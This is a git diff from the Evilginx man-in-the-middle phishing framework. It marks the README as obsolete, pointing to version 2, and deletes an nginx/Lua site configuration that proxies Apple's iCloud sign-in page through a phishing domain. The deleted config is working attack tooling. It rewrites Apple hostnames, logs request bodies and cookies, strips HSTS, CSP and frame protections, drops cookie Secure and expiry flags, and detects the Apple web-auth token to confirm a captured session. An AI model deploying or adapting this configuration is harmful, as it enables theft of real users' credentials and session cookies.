diff --git a/README.md b/README.md index d55d80c..0ea7a26 100644 --- a/README.md +++ b/README.md @@ -2,6 +2,10 @@ ![Evilginx](/img/evilginx-title.png?raw=true "Evilginx") +**THIS VERSION IS OBSOLETE. PLEASE USE THE LATEST VERSION!** + +**EVILGINX 2: https://github.com/kgretzky/evilginx2** + Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It's core runs on Nginx HTTP server, which utilizes `proxy_pass` and `sub_filter` to proxy and modify HTTP content, while intercepting traffic between client and server. You can learn how it works and how to install everything yourself on my blog: @@ -147,4 +151,4 @@ Generated following phishing URLs: : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ -``` \ No newline at end of file +``` diff --git a/sites/icloud/idmsa.apple.com.conf b/sites/icloud/idmsa.apple.com.conf deleted file mode 100644 index def7cde..0000000 --- a/sites/icloud/idmsa.apple.com.conf +++ /dev/null @@ -1,136 +0,0 @@ -log_format icloud_idmsa_phish '{"remote_addr":"$remote_addr","time":"$time_local","host":"$http_host","request":"$request","status":"$status","referer":"$http_referer","ua":"$http_user_agent","conn":"$connection","cookies":"$http_cookie","set-cookies":"$set_cookies_all","body":"$request_body"}'; - -server { - listen 80; - listen 443 ssl; - - server_name idmsa.{{PHISH_DOMAIN}}; - - ssl_certificate {{CERT_PUBLIC_PATH}}; - ssl_certificate_key {{CERT_PRIVATE_PATH}}; - - ssl_protocols TLSv1 TLSv1.1 TLSv1.2; - ssl_prefer_server_ciphers on; - ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH'; - - if ($scheme = http) { - return 301 https://$server_name$request_uri; - } - - location / { - proxy_pass https://{{TARGET_HOST[4]}}; - proxy_cookie_domain {{COOKIE_HOST[2]}} {{PHISH_DOMAIN}}; - proxy_cookie_domain idmsa.{{COOKIE_HOST[2]}} idmsa.{{PHISH_DOMAIN}}; - proxy_redirect https://{{TARGET_HOST[4]}}/ https://idmsa.{{PHISH_DOMAIN}}/; - - sub_filter '.icloud.com' '.{{PHISH_DOMAIN}}'; - sub_filter 'appleid.cdn-apple.com' 'appcdn.{{PHISH_DOMAIN}}'; - sub_filter 'idmsa.apple.com' 'idmsa.{{PHISH_DOMAIN}}'; - sub_filter_once off; - sub_filter_types application/json text/javascript; - - set $auth_token "X%-APPLE%-WEBAUTH%-TOKEN"; - - proxy_set_header Accept-Encoding ""; - proxy_set_header X-Real-IP $remote_addr; - proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; - - set_unescape_uri $redir $arg_{{REDIR_ARG}}; - set $set_cookies_all ""; - - access_log {{LOG_DIR}}{{LOG_NAME}} icloud_idmsa_phish; - - access_by_lua_block { - if ngx.var.http_origin ~= nil then - val = string.gsub(ngx.var.http_origin, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}') - ngx.req.set_header("Origin", val) - end - - if ngx.var.http_referer ~= nil then - val = string.gsub(ngx.var.http_referer, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}') - ngx.req.set_header("Referer", val) - end - - if ngx.var.http_cookie ~= nil then - local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)") - local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)") - - if c_rc ~= nil and c_rd ~= nil then - ngx.redirect(c_rc) - end - end - } - - header_filter_by_lua_block { - function get_cookies() - local cookies = ngx.header.set_cookie or {} - if type(cookies) == "string" then - cookies = {cookies} - end - return cookies - end - - function add_cookie(cookie) - local cookies = get_cookies() - table.insert(cookies, cookie) - ngx.header.set_cookie = cookies - end - - function exists_cookie(cookie) - local cookies = get_cookies() - for i, val in ipairs(cookies) do - if string.match(val, "^" .. cookie .. "=") ~= nil then - return true - end - end - return false - end - - ngx.header["Strict-Transport-Security"] = {} - ngx.header["Content-Security-Policy"] = {} - ngx.header["X-FRAME-OPTIONS"] = {} - - if ngx.var.redir ~= "" then - local r_url = ngx.var.redir - if string.sub(r_url,1,1) == '0' then - val = string.sub(ngx.var.redir, 2) - r_url = ngx.decode_base64(val) - end - add_cookie("{{REDIR_ARG}}=" .. ngx.escape_uri(r_url) .. "; path=/") - end - - if ngx.header.location then - end - - if ngx.var.http_cookie ~= nil then - local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)") - local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)") - - if c_rc ~= nil then - if exists_cookie(ngx.var.auth_token) or c_rd ~= nil then - ngx.header.location = ngx.unescape_uri(c_rc) - add_cookie("{{SUCCESS_ARG}}=true; path=/") - end - end - end - - if ngx.header.set_cookie then - local cookies = ngx.header.set_cookie - if not cookies then return end - if type(cookies) ~= "table" then cookies = {cookies} end - local newcookies = {} - local allcookies = "" - for i, val in ipairs(cookies) do - val = string.gsub(val, '; *[mM]ax%-[aA]ge=[^;]*', "") - val = string.gsub(val, '; *[eE]xpires=[^;]*', "") - val = string.gsub(val, '; *[sS]ecure', "") - table.insert(newcookies, val) - if i>1 then allcookies = allcookies .. "||" end - allcookies = allcookies .. val - end - ngx.header.set_cookie = newcookies - ngx.var.set_cookies_all = allcookies - end - } - } -}